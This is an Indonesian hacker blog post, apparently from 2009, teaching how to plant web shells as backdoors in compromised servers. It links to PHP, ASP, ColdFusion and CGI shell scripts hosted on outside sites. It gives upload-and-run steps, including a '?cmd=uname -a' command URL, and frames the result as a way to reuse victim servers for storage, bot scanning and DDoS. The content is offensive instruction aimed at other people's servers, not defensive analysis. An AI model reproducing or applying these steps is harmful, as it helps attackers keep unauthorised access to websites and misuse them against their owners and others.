|[!]Blog : http://elv1n4.blogspot.com |
|[-]Gretzz : #SolpotCreW,#nyubicrew, |
|#noscan, #hitamputih, cyberdos family |
|-----------------------------------------------------|
-------------------------------------------------------

------------------------------------------------------
-> TAG OF CONCEPT <-
------------------------------------------------------
|
|
|----------> apa itu backdoor ?
| |
| |
| |-----> backdooring PHP
| |
| |
| |
| |-----> backdooring ASP
| |
| |
| |
| |-----> backdooring Coldfusion
| |
| |
| |
| |-----> backdooring CGI
|
|
|
|
|
|
|
|---------> Penuntup

------------------------------------------------------
-> END OF FILES <-
------------------------------------------------------




------------------------------------------------------
apa itu backdoor ?
------------------------------------------------------
Backdoor salah satu senjata remote shell hacker yang di pakai untuk kembali masuk pada web victim yang pernah di kuasainya[ powned ], dengan berbagai cara mereka jadikan victim tersebut menjadi zombie mereka .
ya mereka bisa menggunakan dan memanfaatkan fasilitas webserver yang telah di masukan backdoor.
seperti menyimpan data, melakukan botscan , dan sampai melakukan aktifitas DDOS.

------------------------------------------------------
backdooring PHP
------------------------------------------------------

backdooring php sering kita sebutjuga sebagai php shell
yah , script yang bisa melakukan bypass login admin atau sampai mendapatkan hah akses root.
contoh script dari php shell :

http://www.bodyboarding.tv/includes/php.txt

cara penggunaannya :
simpan script dengan nama elv1n4.php , lalu upload ke webservertarget ,lalu jalankan perintah misalkan.

http://webservertarget.us/store/elv1n4.php?cmd=uname -a
maka yang akan muncul dalam browser kita adalah nama,tipe, server dari target.
tag" remote tersebut berpengaruh bagi webserver yang telah terinjeksi backdoor,
maka attacker dapat melakukan fasilitas upload file, membuat file, menghapus file, dan merubah mode server atau CHMOD ( jika kita menduduki akses r00t )

------------------------------------------------------
backdooring ASP
------------------------------------------------------
backdooring ASP sama halnya dengan PHP, namun berbeda bahasa pemogramannya,
nonsen kita mendapatkan webvictim yang ingin kita injeksikan backdoor dengan menggunakan phpshell.
penggunaan ASp SHell menuntut kita untuk belajar console windows.

-----------------
contoh asp shell
-----------------

http://www.bodyboarding.tv/includes/asp.txt


pengunaan asp shell ini dilakukan dengan cara menyimpan script di atas menjadi elv1n4.asp, lalu upload ke directory yang memiliki permision 777, contoh :
http://web/path/elv1n4.asp <----

lalu kita dapat mengakses kembali server tersebut dengan mengetikan pada url seperti :
http://web/path/elv1n4.asp


----------------------
backdooring Coldfusion
----------------------

backdooring coldfusion sama halnya dengan ASP, namun sama halnya berbeda language .
contoh script coldfusion shell

-----------------------
contoh coldfusion shell
------------------------

http://www.bodyboarding.tv/includes/cfm.txt

----------------------------

cara penggunaan coldfusion shell ini dengan cara save source di atas menjadi elv1n4.cfm , lalu upload pada webserver ,lalu kita bisa menjalankan backdoor tersebut . :)


-----------------------
backdooring CGI
-----------------------
backdooring CGI sama halnya cara nya dengan penanaman backdoor lainnya ,
tetapi beda console , console disini ada yang memanfaatkan bahasa perl (.pl) atau python (.py) atau CGI (cgi) .

----------------------
contoh source CGIshell
----------------------

http://www.bodyboarding.tv/includes/cgi.txt

cara penggunaan backdoor ini .
cukup kita save source diatas menjadi elv1n4.cgi
lalu kita upload elv1n4.cgi ke file cgi-bin pada webserver :) .

atau kita bisa gunakan script ini :

http://www.a1e.es/templates/beez/cgi.txt

lalu kita coba upload di webservervictim apache

http://webservervictim/cgi-bin/cgi.pl


-------------------
Penuntup
-------------------


artikel ini mungkin bisa berguna bagi kita semuanya,
CMIIW



------------------------------------------------------
-> END OF FILES <-
------------------------------------------------------

Labels:


at 10:41 AM



My Profile:


Biography:

short story:

[ Friends Link ]

[ chat with me ]


[ archives ]

[ Notices ]

By title

Apakah mereka jagoan ?
Meningkatkan Sekuriti Jaringan Komputer Anda
Kesalahan Fatal penulisan scripts php
Project finished, Wordpress Vulnerability full disclosure
malam sepi cuma bisa bikin tutorial backdoor

By month

2002.03 2002.12 2005.12 2008.11 2009.02 2009.03 2009.04 2009.05 2009.06 2009.07 2009.08 2009.09 2009.10 2009.11 2009.12 2010.01 2010.03



 


elv1n4 Themes v2.0.0 © 2009 by elv1n4

www[dot]elv1n4.anti-sec[dot]org